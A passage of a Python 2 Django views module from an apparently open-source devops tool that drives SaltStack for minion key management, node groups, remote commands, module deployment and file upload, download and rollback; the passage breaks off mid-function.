| 29.520833 | 139 | 0.736768 |
4a224cf3522cdd805904fd04297a44fa94e48756 | 55,625 | py | Python | deploy/views.py | wxmgcs/devops | 7b0daf6121139c8bec80ec58c119d04d8aeadfe8 | [
"MIT"
] | 3 | 2019-05-06T06:44:43.000Z | 2020-06-10T00:54:43.000Z | deploy/views.py | wxmgcs/devops | 7b0daf6121139c8bec80ec58c119d04d8aeadfe8 | [
"MIT"
] | 1 | 2017-07-11T11:36:54.000Z | 2017-07-11T11:42:23.000Z | deploy/views.py | wxmgcs/devops | 7b0daf6121139c8bec80ec58c119d04d8aeadfe8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf8
'''
@author: qitan
@contact: [email protected]
@file: views.py
@time: 2017/3/30 15:28
@desc:
'''
from django.shortcuts import render, get_object_or_404, redirect
from django.http import Http404, HttpResponse
from django.http import StreamingHttpResponse
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from deploy.saltapi import SaltAPI
from devops import settings
from userperm.views import UserIP
from userperm.models import *
from .models import *
from .forms import *
# custom function
from tar_file import make_tar
from md5 import md5sum
try:
import json
except ImportError:
import simplejson as json
import time
import datetime
import shutil
import os
import re
import tarfile, zipfile
# Create your views here.
def dict_p(dict_a):
r = ''
iftrue = 0
temp = []
if isinstance(dict_a, dict):
for k in dict_a.keys():
if k == 'name':
dict_a.pop(k)
continue
            # flag a failed state when its 'result' value is falsy
            if k == 'result' and not dict_a[k]:
temp.append(1)
else:
temp.append(0)
v = dict_a[k]
if isinstance(v,dict):
dict_p(v)
else:
r = r + k + ': ' + str(v) + '<br />'
if 1 in temp:
iftrue = 1
return {'result':r, 'iftrue':iftrue}
def list_dict(d):
s = {}
result = []
for k,v in d.items():
ret = {}
for m,n in v.items():
temp = dict_p(n)
s[m] = temp['result']
ret['iftrue'] = temp['iftrue']
ret[k] = s
result.append(ret)
return result
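# Shape note (illustrative values, not real salt output): list_dict() turns a
# state.sls return such as
#   {'minion1': {'pkg_|-nginx_|-nginx_|-installed': {'result': True, 'comment': 'ok', 'name': 'nginx'}}}
# into a list like
#   [{'minion1': {'pkg_|-nginx_|-nginx_|-installed': 'result: True<br />comment: ok<br />'}, 'iftrue': 0}]
# where 'iftrue' carries the failure flag computed by dict_p() for that state.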
def ProjectExec(sapi, tgt_list, fun, arg, expr_form):
'''
定义项目进程管理
:param sapi:
:param tgt_list:
:param fun:
:param arg:
:param expr_form:
:return:
'''
jid = sapi.remote_execution(tgt_list, fun, arg + ';echo ":::"$?', expr_form)
s = SaltGroup.objects.get(groupname=tgt_list)
s_len = s.minions.all().count()
ret = ''
rst = {}
while (len(rst) < s_len):
rst = sapi.salt_runner(jid)
# time.sleep(1)
for k in rst:
ret = ret + u'主机:<span style="color:#e6db74">' + k + '</span><br />运行结果:<br />%s<br />' % rst[k]
r = rst[k].split(':::')[-1].strip()
if r != '0':
ret = ret + '<span style="color:#f92672">%s</span> 执行失败!<br />' % arg + '<br />'
else:
ret = ret + '<span style="color:#e6db74">%s</span> 执行成功!<br />' % arg + '<br />'
return {u'进程管理': {'result': ret}}
def RemoteExec(request, fun, group=False):
'''
    Execute a remote command (cmd.run) or deploy a module (state.sls) through the salt API and collect the results.
'''
command_list = [j.command.split(',') for i in request.user.group.all() for j in i.command.filter(is_allow=True)]
command_list = [j for i in command_list for j in i]
check = 2
is_group = False
ret = ''
temp_dict = {}
result = []
jid = ''
arg = ''
if request.method == 'POST':
if request.is_ajax():
if request.POST.get('check_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_list = SaltGroup.objects.get(nickname=grp).groupname
expr_form = 'nodegroup'
is_group = True
else:
tgt_select = request.POST.getlist('tgt_select[]')
if not tgt_select:
tgt_list = request.POST.get('tgt_select')
else:
tgt_list = ','.join(tgt_select)
expr_form = 'list'
if fun == 'cmd.run':
arg = request.POST.get('arg').strip(' ')
else:
arg = request.POST.get('arg')
module = ModuleUpload.objects.get(pk=arg)
if module.visible == 0:
arg = 'module.user_%s.%s'%(module.user.pk, module.module)
elif module.visible == 2:
arg = 'module.public.%s'%module.module
else:
arg = 'module.group_%s.%s'%(module.user_group.pk, module.module)
if is_group:
s = SaltGroup.objects.get(groupname=tgt_list)
s_len = s.minions.all().count()
else:
s = tgt_list.split(',')
s_len = len(s)
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
try:
            ## remote command (cmd.run)
if fun == 'cmd.run':
if arg in command_list and not request.user.is_superuser:
sret = {'CRITICAL': '不能执行此命令,老大会不高兴滴...', 'iftrue':2}
result.append(sret)
elif not arg or not tgt_list:
check = 1
sret = {'WARNING': '未选择主机或未输入命令...', 'iftrue':1}
result.append(sret)
else:
is_danger = []
for command in command_list:
for j in command.split(' '):
if j == arg:
is_danger.append(1)
if is_danger and not request.user.is_superuser:
sret = {'CRITICAL': '不能执行此命令,老大会不高兴滴...', 'iftrue':2}
result.append(sret)
else:
jid = sapi.remote_execution(tgt_list, fun, arg + ';echo ":::"$?', expr_form)
rst = {}
t = 0
r = None
while (t < 5):
rst = sapi.salt_runner(jid)
if len(rst) == s_len:
r = True
break
t = t + 1
#time.sleep(1)
if r:
check = 0
for k, v in rst.items():
check = v.split(':::')[-1].strip()
result.append({k:v.replace('\n', '<br />'), 'iftrue':int(check)})
else:
check = 1
sret = {'INFO': '请稍候点击[重新查询]或到任务管理中查询结果<jid: %s>...'%jid, 'iftrue':1}
result.append(sret)
            ## module deployment (state.sls)
else:
jid = sapi.remote_execution(tgt_list, fun, arg, expr_form)
rst = {}
t = 0
r = None
while(t<3):
rst = sapi.salt_runner(jid)
if len(rst) == s_len:
r = True
break
t = t + 1
#time.sleep(1)
if r:
check = 0
sret = rst
result = list_dict(sret)
else:
check = 1
sret = {'INFO': {'消息': '请稍候点击[重新查询]或到任务管理中查询结果<jid: %s>...'%jid}, 'iftrue':1}
result.append(sret)
if not arg or not tgt_list:
check = 1
sret = {'WARNING': {'警告': '未选择主机或未输入命令...'}, 'iftrue':1}
result.append(sret)
temp_dict['result'] = result
temp_dict['jid'] = jid
except:
pass
return {'result':result, 'sret':temp_dict, 'arg':arg, 'jid':jid, 'check':check, 'is_group':is_group}
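# Return sketch: 'sret' is what the ajax views serialise back to the browser
# ({'result': [...], 'jid': '<salt job id>'}), 'check' holds the last retcode
# (2 by default, 1 while the job is still pending), and 'is_group' records
# whether a nodegroup target was used.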
def UploadFile(request, form, group=False):
'''
    Upload a file to the selected hosts through the salt fileserver, backing up any existing remote copy first.
'''
danger = []
check = False
is_group = False
rst = ''
ret = ''
jid = ''
fileupload = FileUpload()
if request.method == 'POST':
dir_list = [j.directory.split(',') for i in request.user.group.all() for j in i.directory.filter(is_allow=True)]
dir_list = [j for i in dir_list for j in i]
form = SaltFileForm(request.POST)
if request.is_ajax():
file_path = request.FILES.get('file_path', None)
remote_path = request.POST.get('remote_path', None)
remark = request.POST.get('remark', None)
            print 'upload debug:', file_path, remote_path, remark  # debug output
if not file_path:
return HttpResponse(json.dumps(u'未选择文件'))
if remote_path not in dir_list or request.user.is_superuser:
tag = '%s%s'%(request.user.id, datetime.datetime.now().strftime('%j%Y%m%d%H%M%S'))
upload_dir = './media/salt/fileupload/user_%s/%s' % (request.user.id, tag)
if not os.path.exists(upload_dir):
os.makedirs(upload_dir)
dest = open(os.path.join(upload_dir, file_path.name), 'wb+')
for chunk in file_path.chunks():
dest.write(chunk)
dest.close()
if request.POST.get('check_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_list = SaltGroup.objects.get(nickname=grp).groupname
expr_form = 'nodegroup'
is_group = True
tgt_select = [tgt_list]
else:
tgt_select = request.POST.getlist('tgt_select')
tgt_list = ','.join(tgt_select)
expr_form = 'list'
objs = [
FileUpload(
user = request.user,
target = tgt,
file_path = file_path,
remote_path = remote_path,
file_tag = tag,
remark = remark
)
for tgt in tgt_select
]
FileUpload.objects.bulk_create(objs)
local_path = 'salt://fileupload/user_%s/%s/%s'%(request.user.id, tag, file_path.name)
remote_path = '%s/%s'%(remote_path, file_path.name)
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
                # compute the MD5 of the uploaded file
file_md5 = md5sum(os.path.join(upload_dir, file_path.name))
                # back up the existing remote file first
ret_bak = sapi.file_manage(tgt_list, 'file_bakup.Backup', remote_path, tag, file_md5, expr_form)
                # copy the file from the salt fileserver to the remote hosts
ret = sapi.file_copy(tgt_list, 'cp.get_file', local_path, remote_path, expr_form)
                # for a nodegroup upload only one rollback record is needed; group_forloop is set to False after the first host
group_forloop = True
for k in ret:
if ret[k] and ret_bak[k] == 0:
rst = rst + u'主机:' + k + u'\n远程文件%s上传成功,备份成功...\n' % remote_path + '-' * 80 + '\n'
if request.POST.get('check_type') == 'panel-group' and group_forloop:
try:
FileRollback.objects.get_or_create(user=request.user,target=tgt_list,cur_path=remote_path,
bak_path=remote_path,file_tag=tag,
remark=remark,is_group=True)
except:
print 'not create'
group_forloop = False
else:
try:
FileRollback.objects.get_or_create(user=request.user,target=k,cur_path=remote_path,
bak_path=remote_path,file_tag=tag,
remark=remark)
except:
print 'not create'
elif ret[k] and ret_bak[k] == 1:
rst = rst + u'主机:' + k + u'\n远程文件%s未更改...\n' % remote_path + '-' * 80 + '\n'
elif ret[k] and not ret_bak[k]:
rst = rst + u'主机:' + k + u'\n远程文件%s上传成功,备份失败或不存在...\n' % remote_path + '-' * 80 + '\n'
else:
rst = rst + u'主机:' + k + u'\n远程文件%s上传失败...\n'%remote_path + '-'*80 + '\n'
else:
rst = u'无权限更改此目录'
return {'ret':rst, 'check':check, 'is_group':is_group}
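# Flow summary: uploads are stored under ./media/salt/fileupload/user_<id>/<tag>/
# and served to minions as salt://fileupload/user_<id>/<tag>/<name>; the existing
# remote file is backed up first (file_bakup.Backup) so the FileRollback records
# created here can restore it later.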
def AjaxResult(jid,result_type,check_type):
'''
    Poll a salt job by jid, format the output for the ajax response and update the audit log entry.
'''
sret = {}
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
rtype = '远程命令'
result = ''
t = 0
r = None
while (t < 3):
rst = sapi.salt_runner(jid)
if rst:
r = True
break
t = t + 1
#time.sleep(1)
if check_type == 'deploy':
rtype = '模块部署'
if r:
sret = rst
sret = list_dict(sret)
else:
sret = {'INFO': {'消息': '请稍候重新查询...'}}
try:
for k,v in sret.items():
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />'
for m,n in v.items():
result = result + m + '<br />' + n
result = result + "</p>"
except:
result = 'Err'
else:
if r:
for k,v in rst.items():
sret[k] = v.replace('\n', '<br />')
else:
sret = {'INFO': '请稍候重新查询...'}
for k,v in sret.items():
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />' + v + '</p>'
try:
        # update the audit log entry created when the job was submitted
message = get_object_or_404(Message, action=jid)
m = re.search('\[([^:]*)\]', message.content)
arg = m.groups()[0]
message.content = '%s:[%s]<br />原始输出:<br />%s'%(rtype, arg, result)
message.audit_time = datetime.datetime.now()
message.save()
except:
print 'Err'
pass
#if result_type == '1':
return sret
#else:
# return rst_all
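# Return sketch (illustrative): for a cmd.run job the returned dict looks like
#   {'minion1': 'command output<br />...'}; for a 'deploy' job it is the
# list_dict()-style list built above. The audit log entry for the jid is
# updated as a side effect.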
@login_required
def salt_key_list(request):
'''
    List accepted and pending salt minions.
'''
if request.user.is_superuser:
minions = SaltHost.objects.filter(status=True)
minions_pre = SaltHost.objects.filter(status=False)
return render(request, 'salt_key_list.html', {'all_minions':minions,'all_minions_pre':minions_pre})
else:
raise Http404
@login_required
def salt_program_list(request):
if request.user.is_superuser:
minions = SaltHost.objects.filter(status=True)
minions_pre = SaltHost.objects.filter(status=False)
print minions
print minions_pre
return render(request, 'salt_program_list.html', {'all_minions':minions,'all_minions_pre':minions_pre})
else:
raise Http404
@login_required
def salt_key_import(request):
'''
    Import minion keys from the salt master and refresh their alive status in the database.
'''
if request.user.is_superuser:
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
minions,minions_pre = sapi.list_all_key()
alive = False
ret_alive = sapi.salt_alive('*')
for node_name in minions:
try:
alive = ret_alive[node_name]
alive = True
except:
alive = False
try:
SaltHost.objects.create(hostname=node_name,alive=alive,status=True)
except:
salthost = SaltHost.objects.get(hostname=node_name)
now = datetime.datetime.now()
alive_old = SaltHost.objects.get(hostname=node_name).alive
if alive != alive_old:
salthost.alive_time_last = now
salthost.alive = alive
salthost.alive_time_now = now
salthost.save()
for node_name in minions_pre:
try:
SaltHost.objects.get_or_create(hostname=node_name,alive=alive,status=False)
except:
print 'not create'
return redirect('key_list')
else:
raise Http404
@login_required
def salt_key_manage(request, hostname=None):
'''
    Accept, delete or refresh a salt minion key and update the database accordingly.
'''
if request.user.is_superuser:
if request.method == 'GET':
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
hostname = request.GET.get('hostname')
salthost = SaltHost.objects.get(hostname=hostname)
action = ''
if request.GET.has_key('add'):
ret = sapi.accept_key(hostname)
if ret:
salthost.status=True
salthost.save()
result = 3
action = u'添加主机'
if request.GET.has_key('delete'):
ret = sapi.delete_key(hostname)
if ret:
salthost.status=False
salthost.save()
result = 2
action = u'删除主机'
if request.GET.has_key('flush') and request.is_ajax():
                # result: 0 = online | 1 = offline
result = 0
ret = sapi.salt_alive(hostname)
try:
alive = ret[hostname]
alive = True
except:
alive = False
result = 1
salthost.alive=alive
salthost.save()
action = u'刷新主机'
if action:
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=action,
action_ip=UserIP(request),
content=u'%s %s' % (action, salthost.hostname))
return HttpResponse(json.dumps(result))
if action:
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=action, action_ip=UserIP(request),content=u'%s %s'%(action,salthost.hostname))
return redirect('key_list')
else:
raise Http404
@login_required
def salt_group_list(request):
'''
    List salt minion groups.
'''
if request.user.is_superuser:
groups = SaltGroup.objects.all()
return render(request, 'salt_group_list.html', {'all_groups': groups})
else:
raise Http404
@login_required
def salt_group_manage(request, id=None):
'''
    Create, edit or delete a minion group and keep the salt-master nodegroup config file in sync.
'''
if request.user.is_superuser:
action = ''
page_name = ''
if id:
group = get_object_or_404(SaltGroup, pk=id)
action = 'edit'
page_name = '编辑分组'
else:
group = SaltGroup()
action = 'add'
page_name = '新增分组'
if request.method == 'GET':
if request.GET.has_key('delete'):
id = request.GET.get('id')
group = get_object_or_404(SaltGroup, pk=id)
group.delete()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=u'删除分组', action_ip=UserIP(request),content='删除分组 %s'%group.nickname)
with open('./saltconfig/nodegroup.conf','r') as f:
with open('./nodegroup', 'w') as g:
for line in f.readlines():
if group.groupname not in line:
g.write(line)
shutil.move('./nodegroup','./saltconfig/nodegroup.conf')
return redirect('group_list')
if request.method == 'POST':
form = SaltGroupForm(request.POST, instance=group)
if form.is_valid():
minion_select = request.POST.getlist('minion_sel')
minion_delete = request.POST.getlist('minion_del')
                # the UI displays the group nickname; the underlying group name stays unchanged
if action == 'add':
group = form.save(commit=False)
group.groupname = form.cleaned_data['nickname']
elif action == 'edit':
form.save()
group.save()
group.minions.add(*minion_select)
group.minions.remove(*minion_delete)
group.save()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=page_name, action_ip=UserIP(request),content='%s %s'%(page_name,group.nickname))
minions_l = []
for m in group.minions.values('hostname'):
minions_l.append(m['hostname'])
minions_str = ','.join(minions_l)
try:
with open('./saltconfig/nodegroup.conf','r') as f:
with open('./nodegroup', 'w') as g:
for line in f.readlines():
if group.groupname not in line:
g.write(line)
g.write(" %s: 'L@%s'\n"%(group.groupname,minions_str))
shutil.move('./nodegroup','./saltconfig/nodegroup.conf')
except:
with open('./saltconfig/nodegroup.conf', 'w') as g:
g.write("nodegroups:\n %s: 'L@%s'\n"%(group.groupname,minions_str))
import subprocess
subprocess.Popen('systemctl restart salt-master salt-api', shell=True)
return redirect('group_list')
else:
form = SaltGroupForm(instance=group)
return render(request, 'salt_group_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'aid':id})
else:
raise Http404
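# Note: the nodegroup file written above follows the salt-master 'nodegroups'
# syntax, roughly (illustrative group and minion names):
#   nodegroups:
#     web: 'L@minion1,minion2'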
@login_required
def salt_module_list(request):
'''
    List deployable modules visible to the current user.
'''
if request.user.has_perm('deploy.view_deploy'):
if request.user.is_superuser:
module_list = ModuleUpload.objects.all()
else:
            # modules created by the user or marked public
module_visible_list = [{'pk': i.pk, 'name': i.name, 'module': i.module, 'remark': i.remark, 'user': i.user}
for i in ModuleUpload.objects.filter(Q(user=request.user) | Q(visible=2))]
            # modules shared through the user's groups
module_user_group_list = [{'pk': i.pk, 'name': i.name, 'module': i.module, 'remark': i.remark, 'user': i.user}
for g in User.objects.get(pk=request.user.pk).group.all() for i in ModuleUpload.objects.filter(user_group=g)]
            # merge the two lists, dropping duplicates
module_list = module_visible_list + [i for i in module_user_group_list if i not in module_visible_list]
return render(request, 'salt_module_list.html', {'modules':module_list})
else:
raise Http404
@login_required
def salt_module_manage(request, id=None):
'''
    Create, edit or delete a deployable module (an uploaded .sls file or archive).
'''
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_module']):
ret = ''
upload_stat = True
if id:
module = get_object_or_404(ModuleUpload, pk=id)
if request.user.pk != module.user.pk and not request.user.is_superuser:
return HttpResponse("Not Allowed!")
old_path = module.upload_path.path.split('.')
action = 'edit'
page_name = '编辑模块'
else:
module = ModuleUpload()
action = 'add'
page_name = '新增模块'
if request.method == 'GET':
if request.GET.has_key('delete'):
id = request.GET.get('id')
module = get_object_or_404(ModuleUpload, pk=id)
if request.user.pk != module.user.pk and not request.user.is_superuser:
return HttpResponse("Not Allowed!")
module.delete()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=u'删除模块', action_ip=UserIP(request),content=u'删除模块 %s'%module.name)
cur_path = module.upload_path.path.split('.')[0]
try:
os.remove('%s.sls'%(cur_path))
except:
shutil.rmtree(cur_path, ignore_errors=True)
return redirect('module_list')
if request.method == 'POST':
form = ModuleForm(request.POST, request.FILES, instance=module)
if form.is_valid():
visible = form.cleaned_data['visible']
module_list = form.cleaned_data['module'].split('.')
user_group = request.POST.get('user_group')
if visible == 0:
ext_path = './media/salt/module/user_%s' % request.user.id
salt_path = 'salt://module/user_%s/%s' % (request.user.id, module_list[0])
elif visible == 2:
ext_path = './media/salt/module/public'
salt_path = 'salt://module/public/%s'%module_list[0]
else:
ext_path = './media/salt/module/group_%s' % user_group
salt_path = 'salt://module/group_%s/%s' % (user_group, module_list[0])
file_exists = request.POST.get('upload_path')
file_name = form.cleaned_data['upload_path']
file_ext = str(file_name).split('.')[-1]
ext = ['bz2','gz','zip','sls']
if file_ext in ext:
if action == 'add':
module = form.save(commit=False)
module.user = request.user
else:
form.save
if user_group:
module.user_group = UserGroup.objects.get(pk=user_group)
module.save()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=page_name, action_ip=UserIP(request),content='%s %s'%(page_name,module.name))
src = module.upload_path.path
if file_exists == None:
try:
os.remove('%s.sls'%old_path[0])
except:
pass
try:
if file_ext == 'zip':
tar = zipfile.ZipFile(src)
else:
tar = tarfile.open(src)
tar.extractall(path=ext_path)
tar.close()
with open('%s/%s/%s.sls'%(ext_path,module_list[0],module_list[1]), 'r+') as f:
t = f.read()
t = t.replace('SALTSRC', salt_path)
f.seek(0, 0)
f.write(t)
ret = u'模块 %s 已上传完成!'%(file_name)
except:
upload_stat = False
ret = u'模块 %s 上传失败,请上传.sls文件或.tar.gz/.tar.bz2/.zip压缩包并确认压缩文件是否损坏!'%(file_name)
try:
os.remove(src)
except:
shutil.rmtree(src, ignore_errors=True)
pass
if upload_stat:
return redirect('module_list')
else:
return render(request, 'salt_module_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'ret':ret})
else:
ret = u'不支持的文件格式,请上传.sls文件或.tar.gz/.tar.bz2/.zip压缩包!'
else:
form = ModuleForm(instance=module)
return render(request, 'salt_module_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'ret':ret, 'id':id})
else:
raise Http404
@login_required
def salt_ajax_minions(request):
'''
    Return the minions that belong to the selected group (ajax).
'''
if request.user.has_perms(['deploy.view_deploy']):
ret = []
if request.method == 'POST':
grp = request.POST.get('tgt_select', None)
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
if request.is_ajax():
group = SaltGroup.objects.get(groupname=tgt_select)
group_minions = group.minions.all()
for i in group_minions:
ret.append(i.hostname)
return HttpResponse(json.dumps(ret))
else:
raise Http404
@login_required
def salt_ajax_result(request):
'''
    Query a salt job result by jid (ajax).
'''
if request.user.has_perm('deploy.edit_deploy'):
if request.method == 'POST':
check_type = request.POST.get('type', None)
jid = request.POST.get('jid', None)
result_type = request.POST.get('result_type', None)
if request.is_ajax():
rst_all = AjaxResult(jid,result_type,check_type)
return HttpResponse(json.dumps(rst_all))
else:
raise Http404
@login_required
def salt_remote_exec(request):
'''
    Render the remote command page.
'''
if request.user.has_perm('deploy.view_deploy'):
return render(request, 'salt_remote_exec.html', {'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_ajax_remote_exec(request):
'''
    Execute a remote command (ajax) and log the result.
'''
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_deploy']):
result = ''
rst = RemoteExec(request, fun='cmd.run')
if not rst['jid']:
rst['jid'] = 'DANGER'
try:
for i in rst['sret']['result']:
for k, v in i.items():
if k != 'iftrue':
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />' + v + '<br />'
result = result + 'retcode: %s</p>' % i['iftrue']
except:
result = 'Err'
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=rst['jid'], action_ip=UserIP(request),
content=u'远程命令 [%s]<br />原始输出:<br />%s' % (rst['arg'], result))
return HttpResponse(json.dumps(rst['sret']))
else:
raise Http404
@login_required
def salt_module_deploy(request):
'''
    Render the module deployment page.
'''
if request.user.has_perm('deploy.view_deploy'):
modules = ModuleUpload.objects.all()
return render(request, 'salt_module_deploy.html', {'modules':modules, 'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_ajax_module_deploy(request):
'''
    Deploy a module via state.sls (ajax) and log the result.
'''
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_deploy']):
result = ''
rst = RemoteExec(request, fun='state.sls')
try:
for i in rst['sret']['result']:
for k, v in i.items():
if k != 'iftrue':
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />'
for m, n in v.items():
result = result + m + '<br />' + n
result = result + 'retcode: %s</p>' % i['iftrue']
except:
result = 'Err'
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=rst['jid'], action_ip=UserIP(request),
content=u'模块部署 [%s]<br />原始输出:<br />%s' % (rst['arg'], result))
return HttpResponse(json.dumps(rst['sret']))
else:
raise Http404
@login_required
def salt_advanced_manage(request):
if request.user.has_perms(['deploy.view_deploy']):
ret = ''
sret = {}
result = []
check = 2
is_group = False
if request.method == 'POST':
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_deploy']):
if request.is_ajax():
tgt_selects = request.POST.getlist('tgt_select', None)
args = request.POST.getlist('arg', None)
checkgrp = request.POST.getlist('ifcheck', None)
check_type = request.POST.get('check_type', None)
if check_type == 'panel-group':
is_group = True
expr_form = 'nodegroup'
else:
expr_form = 'list'
s='::'.join(str(i) for i in checkgrp)
checkgrp = s.replace('0::1','1').split('::')
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
for i in range(0,len(tgt_selects)):
tgt = tgt_selects[i]
try:
jid = sapi.remote_execution(tgt, 'cmd.run', args[i] + ';echo ":::"$?', expr_form)
if is_group:
                                ## number of minions in the target group
s = SaltGroup.objects.get(groupname=tgt)
s_len = s.minions.all().count()
else:
s_len = 1
rst = {}
t = 0
r = None
while (t < 5):
rst = sapi.salt_runner(jid)
if len(rst) == s_len:
r = True
break
t = t + 1
#time.sleep(1)
if r:
sret = {}
j = 0
for k, v in rst.items():
iftrue = v.split(':::')[-1].strip()
if iftrue != '0':
check = 2
if checkgrp[i] == '0':
try:
Message.objects.create(type=u'部署管理', user=request.user.first_name,
action=jid, action_ip=UserIP(request),
content=u'高级管理 Test')
except:
print 'Log Err'
return HttpResponse(json.dumps(ret))
else:
continue
else:
check = 0
if is_group:
sret['L%s-%s: %s'%(i,j,k)] = v.replace('\n', '<br />')
else:
sret['L%s: %s' % (i, k)] = v.replace('\n', '<br />')
sret['iftrue'] = check
j = j + 1
else:
check = 1
sret = {'INFO': '请稍候点击[重新查询]或到任务管理中查询结果<jid: %s>...'%jid}
result.append(sret)
except:
print 'Err'
try:
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=jid, action_ip=UserIP(request),content=u'高级管理 Test')
except:
print 'Log Err'
return HttpResponse(json.dumps(result))
else:
raise Http404
return render(request, 'salt_remote_exec_advance.html', {})
else:
raise Http404
@login_required
def salt_file_upload(request):
'''
    Render the file upload page.
'''
if request.user.has_perm('deploy.view_filemanage'):
form = SaltFileForm()
return render(request, 'salt_file_upload.html', {'form':form,'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_file_download(request):
def file_iterator(file_name, chunk_size=512):
with open(file_name) as f:
while True:
c = f.read(chunk_size)
if c:
yield c
else:
break
if request.user.has_perms(['deploy.view_filemanage']):
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
if request.method == 'POST':
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_filedownload']):
if request.POST.get('type') == 'list':
rst = RemoteExec(request, fun='cmd.run')
return HttpResponse(json.dumps(rst['ret']))
else:
tgt_list = request.POST.get('tgt_select', None)
arg = request.POST.get('arg', None)
jid = sapi.remote_execution(tgt_list, 'cmd.run', 'if [ -d %s ];then echo 0;else echo 1;fi'%arg, 'list')
rst = sapi.salt_runner(jid)
if rst[tgt_list] == '0':
return HttpResponse(json.dumps(arg))
elif rst[tgt_list] == '1':
return HttpResponse(json.dumps("download"))
else:
print 'Err'
else:
raise Http404
if request.method == 'GET':
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_filedownload']):
if request.GET.get('type') == 'download':
tgt_select = request.GET.get('tgt_select', None)
arg = request.GET.get('arg', None)
remote_file = arg
ret_bak = sapi.file_bak(tgt_select, 'cp.push', remote_file, 'list')
if tgt_select == 'localhost':
return render(request,'redirect.html',{})
remote_path = remote_file.replace(remote_file.split('/')[-1],'')
dl_path = './media/salt/filedownload/user_%s/%s%s'%(request.user.id,tgt_select,remote_path)
dl_file = '%s%s'%(dl_path,remote_file.split('/')[-1])
if not os.path.exists(dl_path):
os.makedirs(dl_path)
try:
shutil.copy('/var/cache/salt/master/minions/%s/files/%s' % (tgt_select,remote_file), dl_file)
tar_file = make_tar(dl_file,'/tmp')
dl_filename = 'attachment;filename="{0}"'.format(tar_file.replace('/tmp/','%s%s'%(tgt_select,remote_path)))
ret = u'主机:%s\n结果:远程文件 %s 下载成功!'%(tgt_select,remote_file)
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件下载', action_ip=UserIP(request),content=u'下载文件 \n%s'%ret)
response = StreamingHttpResponse(file_iterator(tar_file))
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = dl_filename
return response
except:
print 'No such file or dirctory'
ret = u'主机:%s\n结果:远程文件 %s 下载失败,请确认文件是否存在!'%(tgt_select,remote_file)
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件下载', action_ip=UserIP(request),content=u'下载文件 \n%s'%ret)
return render(request, 'salt_file_download.html', {'ret':ret})
else:
raise Http404
return render(request, 'salt_file_download.html', {})
else:
raise Http404
@login_required
def salt_ajax_file_upload(request):
'''
    Handle the ajax file upload and log the result.
'''
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_fileupload']):
form = SaltFileForm()
ret = UploadFile(request,form=form)
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件上传', action_ip=UserIP(request),content=u'上传文件 %s'%ret['ret'])
return HttpResponse(json.dumps(ret['ret']))
else:
raise Http404
@login_required
def salt_file_rollback(request):
'''
    Render the file rollback page.
'''
if request.user.has_perm('deploy.view_filemanage'):
form = SaltFileForm()
return render(request, 'salt_file_rollback.html', {'form':form,'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_ajax_file_rollback(request):
'''
    Handle ajax file rollback: list rollback targets, tags and remarks, or perform the rollback itself.
'''
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_fileupload']):
true = True
if request.method == 'POST':
if request.is_ajax():
r_list = []
if request.POST.get('check_type') == 'rollback_file':
if request.POST.get('get_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
else:
tgt_select = request.POST.get('tgt_select')
rollback_list = FileRollback.objects.filter(target=tgt_select)
r_list = []
for r in rollback_list:
r_list.append(r.cur_path)
func = lambda x,y:x if y in x else x + [y]
r_list = reduce(func,[[],]+r_list)
return HttpResponse(json.dumps(r_list))
if request.POST.get('check_type') == 'rollback_history_list':
if request.POST.get('get_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
else:
tgt_select = request.POST.get('tgt_select')
cur_path = request.POST.get('rollback_list', None)
rollback_history_list = FileRollback.objects.filter(cur_path=cur_path).filter(target=tgt_select)
for r in rollback_history_list:
r_list.append(r.file_tag)
return HttpResponse(json.dumps(r_list))
if request.POST.get('check_type') == 'rollback_history_remark':
